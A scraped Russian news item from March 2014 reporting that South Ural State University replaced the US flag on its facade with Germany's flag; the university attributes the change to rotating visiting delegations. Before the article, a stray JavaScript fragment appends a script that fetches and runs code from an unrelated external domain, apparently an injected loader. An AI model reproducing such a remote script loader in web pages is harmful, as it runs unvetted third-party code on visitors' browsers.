, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

С фасада ЮУрГУ исчез флаг США

Наблюдательные челябинские студенты заметили, что после заявлений властей Соединенных штатов Америки о возможных санкциях против России в связи с позицией нашей страны относительно Крыма, с фасада главного корпуса исчез флаг США. Знамена вуза и России остались на своих местах, а вот на месте американского флага появился госсимвол Германии. Многие восприняли это как знак солидарности руководства учебного заведения с позицией нашего государства.

Впрочем, руководство ЮУрГУ отмело политическую подоплеку исчезновения флага США. Как пояснили в вузе, третий флаг на фасаде меняется в зависимости того, делегации каких стран гостят в учебном заведении. С 21 по 27 февраля университет посещала американская делегация, а 3 и 4 марта в вуз нанес визит режиссер из США. В честь этих гостей и висел американский флаг. Сейчас в ЮУрГУ гостит делегация из Германии, соответственно на фасаде - флаг Германии.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
20:20 - 06 марта 2014
|
автор: U-RSS
|
(574)
|
(0)

Комментарии (0)

Я человек
Я бот